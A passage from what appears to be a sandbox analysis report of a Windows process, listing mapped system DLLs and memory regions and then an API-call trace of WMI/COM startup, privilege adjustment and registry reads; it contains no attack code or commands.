name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 955
start_va = 0x6e590000
end_va = 0x6e5a7fff
entry_point = 0x6e590000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 956
start_va = 0x15a0000
end_va = 0x15bffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000015a0000"
filename = ""
Region:
id = 957
start_va = 0x21d0000
end_va = 0x22cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000021d0000"
filename = ""
Region:
id = 958
start_va = 0x6e3e0000
end_va = 0x6e3f6fff
entry_point = 0x6e3e0000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 959
start_va = 0x15a0000
end_va = 0x15a4fff
entry_point = 0x15a0000
region_type = mapped_file
name = "wmiutils.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmiutils.dll.mui")
Region:
id = 960
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 961
start_va = 0x15b0000
end_va = 0x15b7fff
entry_point = 0x15b0000
region_type = mapped_file
name = "urlmon.dll.mui"
filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui")
Region:
id = 962
start_va = 0x72880000
end_va = 0x72894fff
entry_point = 0x72880000
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 963
start_va = 0x728a0000
end_va = 0x728f1fff
entry_point = 0x728a0000
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 964
start_va = 0x73080000
end_va = 0x7308cfff
entry_point = 0x73080000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 965
start_va = 0x15c0000
end_va = 0x15c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000015c0000"
filename = ""
Region:
id = 966
start_va = 0x2030000
end_va = 0x206ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002030000"
filename = ""
Region:
id = 967
start_va = 0x73270000
end_va = 0x73275fff
entry_point = 0x73270000
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 968
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 969
start_va = 0x2080000
end_va = 0x20bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002080000"
filename = ""
Region:
id = 970
start_va = 0x74b00000
end_va = 0x74b3bfff
entry_point = 0x74b00000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 971
start_va = 0x7ffd7000
end_va = 0x7ffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd7000"
filename = ""
Region:
id = 972
start_va = 0x74650000
end_va = 0x74654fff
entry_point = 0x74650000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 973
start_va = 0x1610000
end_va = 0x1610fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001610000"
filename = ""
Region:
id = 974
start_va = 0x74070000
end_va = 0x7407ffff
entry_point = 0x74070000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 975
start_va = 0x75c60000
end_va = 0x75c62fff
entry_point = 0x75c60000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 976
start_va = 0x2480000
end_va = 0x248ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 977
start_va = 0x25e0000
end_va = 0x25effff
entry_point = 0x0
region_type = private
name = "private_0x00000000025e0000"
filename = ""
Region:
id = 978
start_va = 0x70020000
end_va = 0x70025fff
entry_point = 0x70020000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 979
start_va = 0x1ff0000
end_va = 0x202ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ff0000"
filename = ""
Region:
id = 980
start_va = 0x6e0d0000
end_va = 0x6e129fff
entry_point = 0x6e0d0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 981
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 982
start_va = 0x6dfb0000
end_va = 0x6dfb7fff
entry_point = 0x6dfb0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 983
start_va = 0x73280000
end_va = 0x7328ffff
entry_point = 0x73280000
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 984
start_va = 0x73250000
end_va = 0x73261fff
entry_point = 0x73250000
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 985
start_va = 0x73240000
end_va = 0x73247fff
entry_point = 0x73240000
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 986
start_va = 0x74af0000
end_va = 0x74af5fff
entry_point = 0x74af0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 987
start_va = 0x73c20000
end_va = 0x73c57fff
entry_point = 0x73c20000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 988
start_va = 0x1670000
end_va = 0x1680fff
entry_point = 0x1670000
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 989
start_va = 0x2360000
end_va = 0x239ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 990
start_va = 0x2780000
end_va = 0x27bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 991
start_va = 0x6d1d0000
end_va = 0x6d281fff
entry_point = 0x6d1d0000
region_type = mapped_file
name = "jscript.dll"
filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll")
Region:
id = 992
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 993
start_va = 0x6f6d0000
end_va = 0x6f6f9fff
entry_point = 0x6f6d0000
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll")
Region:
id = 994
start_va = 0x74fd0000
end_va = 0x7502efff
entry_point = 0x74fd0000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 995
start_va = 0x1690000
end_va = 0x16a4fff
entry_point = 0x1690000
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll")
Region:
id = 996
start_va = 0x719f0000
end_va = 0x71a01fff
entry_point = 0x719f0000
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 997
start_va = 0x71b00000
end_va = 0x71b20fff
entry_point = 0x71b00000
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 998
start_va = 0x1620000
end_va = 0x162bfff
entry_point = 0x1620000
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 999
start_va = 0x17b0000
end_va = 0x17b0fff
entry_point = 0x17b0000
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 1000
start_va = 0x27c0000
end_va = 0x2bb2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000027c0000"
filename = ""
Region:
id = 1001
start_va = 0x17b0000
end_va = 0x17b0fff
entry_point = 0x17b0000
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 1002
start_va = 0x17b0000
end_va = 0x17b3fff
entry_point = 0x17b0000
region_type = mapped_file
name = "jscript.dll.mui"
filename = "\\Windows\\System32\\en-US\\jscript.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\jscript.dll.mui")
Region:
id = 1003
start_va = 0x1800000
end_va = 0x1801fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001800000"
filename = ""
Region:
id = 1004
start_va = 0x2410000
end_va = 0x244ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002410000"
filename = ""
Region:
id = 1005
start_va = 0x713b0000
end_va = 0x713fbfff
entry_point = 0x713b0000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1006
start_va = 0x74290000
end_va = 0x74384fff
entry_point = 0x74290000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1007
start_va = 0x7ffd4000
end_va = 0x7ffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd4000"
filename = ""
Region:
id = 1008
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 1009
start_va = 0x71c30000
end_va = 0x726affff
entry_point = 0x71c30000
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 1010
start_va = 0x77060000
end_va = 0x77064fff
entry_point = 0x77060000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1011
start_va = 0x1810000
end_va = 0x1810fff
entry_point = 0x1810000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 1012
start_va = 0x1820000
end_va = 0x1821fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001820000"
filename = ""
Region:
id = 1013
start_va = 0x1830000
end_va = 0x1833fff
entry_point = 0x1830000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1014
start_va = 0x1840000
end_va = 0x1840fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001840000"
filename = ""
Region:
id = 1015
start_va = 0x1890000
end_va = 0x1893fff
entry_point = 0x1890000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1016
start_va = 0x18e0000
end_va = 0x18fefff
entry_point = 0x18e0000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db")
Region:
id = 1017
start_va = 0x1900000
end_va = 0x192ffff
entry_point = 0x1900000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db")
Region:
id = 1018
start_va = 0x2110000
end_va = 0x2175fff
entry_point = 0x2110000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1019
start_va = 0x752d0000
end_va = 0x752f6fff
entry_point = 0x752d0000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1020
start_va = 0x75300000
end_va = 0x75311fff
entry_point = 0x75300000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1021
start_va = 0x76c00000
end_va = 0x76d9cfff
entry_point = 0x76c00000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Thread:
id = 78
os_tid = 0xa9c
[0058.694] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcf78c | out: lpSystemTimeAsFileTime=0xcf78c*(dwLowDateTime=0xd3d53a10, dwHighDateTime=0x1d469c7))
[0058.694] GetCurrentProcessId () returned 0xa98
[0058.694] GetCurrentThreadId () returned 0xa9c
[0058.694] GetTickCount () returned 0x1cc43
[0058.694] QueryPerformanceCounter (in: lpPerformanceCount=0xcf784 | out: lpPerformanceCount=0xcf784*=1813264000000) returned 1
[0058.695] GetModuleHandleA (lpModuleName=0x0) returned 0x890000
[0058.695] __set_app_type (_Type=0x1)
[0058.695] __p__fmode () returned 0x757a31f4
[0058.695] __p__commode () returned 0x757a31fc
[0058.695] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8cdc15) returned 0x0
[0058.695] __wgetmainargs (in: _Argc=0x8dc5e8, _Argv=0x8dc5f0, _Env=0x8dc5ec, _DoWildCard=0, _StartInfo=0x8dc5fc | out: _Argc=0x8dc5e8, _Argv=0x8dc5f0, _Env=0x8dc5ec) returned 0
[0058.697] ??0CHString@@QAE@XZ () returned 0x8dc28c
[0058.698] ??0CHString@@QAE@XZ () returned 0x8dc594
[0058.698] ?Empty@CHString@@QAEXXZ () returned 0x6f900504
[0058.698] SetConsoleCtrlHandler (HandlerRoutine=0x8c6b6f, Add=1) returned 1
[0058.698] _onexit (_Func=0x8d2f1f) returned 0x8d2f1f
[0058.698] _onexit (_Func=0x8d2f2e) returned 0x8d2f2e
[0058.698] _onexit (_Func=0x8d2f42) returned 0x8d2f42
[0058.698] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0058.699] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0058.704] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0058.711] CoCreateInstance (in: rclsid=0x896c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8dc1b0 | out: ppv=0x8dc1b0*=0x490828) returned 0x0
[0058.720] GetCurrentProcess () returned 0xffffffff
[0058.720] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcf634 | out: TokenHandle=0xcf634*=0xf0) returned 1
[0058.720] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcf630 | out: TokenInformation=0x0, ReturnLength=0xcf630) returned 0
[0058.720] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x3, TokenInformation=0x729c8, TokenInformationLength=0x118, ReturnLength=0xcf630 | out: TokenInformation=0x729c8, ReturnLength=0xcf630) returned 1
[0058.720] AdjustTokenPrivileges (in: TokenHandle=0xf0, DisableAllPrivileges=0, NewState=0x729c8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0058.720] CloseHandle (hObject=0xf0) returned 1
[0058.721] GetSystemDirectoryW (in: lpBuffer=0x72aa0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0058.721] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0058.721] SysStringLen (param_1="\\kernel32.dll") returned 0xd
[0058.721] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x75370000
[0058.722] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0058.722] SetThreadUILanguage (LangId=0x0) returned 0x409
[0058.722] FreeLibrary (hLibModule=0x75370000) returned 1
[0058.722] _vsnwprintf (in: _Buffer=0x72a58, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xcf590 | out: _Buffer="ms_409") returned 6
[0058.722] GetComputerNameW (in: lpBuffer=0x72aa0, nSize=0xcf5e8 | out: lpBuffer="CRH2YWU7", nSize=0xcf5e8) returned 1
[0058.722] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.723] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.723] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xcf624 | out: lpNameBuffer=0x0, nSize=0xcf624) returned 0x0
[0058.723] GetLastError () returned 0xea
[0058.723] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x72ae8, nSize=0xcf624 | out: lpNameBuffer="CRH2YWU7\\EEBsYm5", nSize=0xcf624) returned 0x1
[0058.724] lstrlenW (lpString="") returned 0
[0058.724] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.724] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="", cchCount2=0) returned 3
[0058.725] lstrlenW (lpString=".") returned 1
[0058.726] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2=".", cchCount2=1) returned 3
[0058.726] lstrlenW (lpString="LOCALHOST") returned 9
[0058.726] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="LOCALHOST", cchCount2=9) returned 1
[0058.726] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.726] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.726] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CRH2YWU7", cchCount1=8, lpString2="CRH2YWU7", cchCount2=8) returned 2
[0058.726] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.726] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.726] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.726] lstrlenW (lpString="CRH2YWU7") returned 8
[0058.726] SysStringLen (param_1="IDENTIFY") returned 0x8
[0058.726] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0058.726] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0058.726] SysStringLen (param_1="IDENTIFY") returned 0x8
[0058.727] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0058.727] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0058.727] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0058.727] SysStringLen (param_1="IDENTIFY") returned 0x8
[0058.727] SysStringLen (param_1="IDENTIFY") returned 0x8
[0058.727] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0058.727] SysStringLen (param_1="DELEGATE") returned 0x8
[0058.727] SysStringLen (param_1="IDENTIFY") returned 0x8
[0058.728] SysStringLen (param_1="DELEGATE") returned 0x8
[0058.728] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0058.728] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0058.728] SysStringLen (param_1="DELEGATE") returned 0x8
[0058.728] SysStringLen (param_1="NONE") returned 0x4
[0058.728] SysStringLen (param_1="DEFAULT") returned 0x7
[0058.728] SysStringLen (param_1="DEFAULT") returned 0x7
[0058.728] SysStringLen (param_1="NONE") returned 0x4
[0058.729] SysStringLen (param_1="CONNECT") returned 0x7
[0058.729] SysStringLen (param_1="DEFAULT") returned 0x7
[0058.730] SysStringLen (param_1="CALL") returned 0x4
[0058.730] SysStringLen (param_1="DEFAULT") returned 0x7
[0058.730] SysStringLen (param_1="CALL") returned 0x4
[0058.730] SysStringLen (param_1="CONNECT") returned 0x7
[0058.730] SysStringLen (param_1="PKT") returned 0x3
[0058.730] SysStringLen (param_1="DEFAULT") returned 0x7
[0058.730] SysStringLen (param_1="PKT") returned 0x3
[0058.730] SysStringLen (param_1="NONE") returned 0x4
[0058.730] SysStringLen (param_1="NONE") returned 0x4
[0058.730] SysStringLen (param_1="PKT") returned 0x3
[0058.730] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0058.730] SysStringLen (param_1="DEFAULT") returned 0x7
[0058.730] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0058.730] SysStringLen (param_1="NONE") returned 0x4
[0058.730] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0058.730] SysStringLen (param_1="PKT") returned 0x3
[0058.730] SysStringLen (param_1="PKT") returned 0x3
[0058.730] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0058.731] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0058.731] SysStringLen (param_1="DEFAULT") returned 0x7
[0058.731] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0058.731] SysStringLen (param_1="PKT") returned 0x3
[0058.731] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0058.731] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0058.731] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0058.731] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0058.731] GetSystemDirectoryW (in: lpBuffer=0x7ebc8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0058.731] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0058.731] SysStringLen (param_1="\\wbem\\") returned 0x6
[0058.732] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0058.732] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0058.732] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
[0058.732] GetCurrentThreadId () returned 0xa9c
[0058.732] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xcf140 | out: phkResult=0xcf140*=0xf4) returned 0x0
[0058.732] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xcf14c, lpcbData=0xcf148*=0x400 | out: lpType=0x0, lpData=0xcf14c*=0x30, lpcbData=0xcf148*=0x4) returned 0x0
[0058.732] _wcsicmp (_String1="0", _String2="1") returned -1
[0058.732] _wcsicmp (_String1="0", _String2="2") returned -2
[0058.732] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xcf148*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xcf148*=0x42) returned 0x0
[0058.733] RegQueryValueExW (in: hKey=0xf4, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x72dc0, lpcbData=0xcf148*=0x42 | out: lpType=0x0, lpData=0x72dc0*=0x25, lpcbData=0xcf148*=0x42) returned 0x0
[0058.733] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0058.733] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0058.733] RegQueryValueExW (in: hKey=0xf4, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xcf14c, lpcbData=0xcf148*=0x400 | out: lpType=0x0, lpData=0xcf14c*=0x36, lpcbData=0xcf148*=0xc) returned 0x0
[0058.733] _wtol (_String="65536") returned 65536
[0058.733] RegCloseKey (hKey=0x0) returned 0x6
[0058.733] CoCreateInstance (in: rclsid=0x896d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xcf5dc | out: ppv=0xcf5dc*=0x16b4630) returned 0x0
[0058.762] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x16b4630, xmlSource=0xcf560*(varType=0x8, wReserved1=0xffff, wReserved2=0x6570, wReserved3=0x76f7, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xcf5c4 | out: isSuccessful=0xcf5c4*=0xffff) returned 0x0
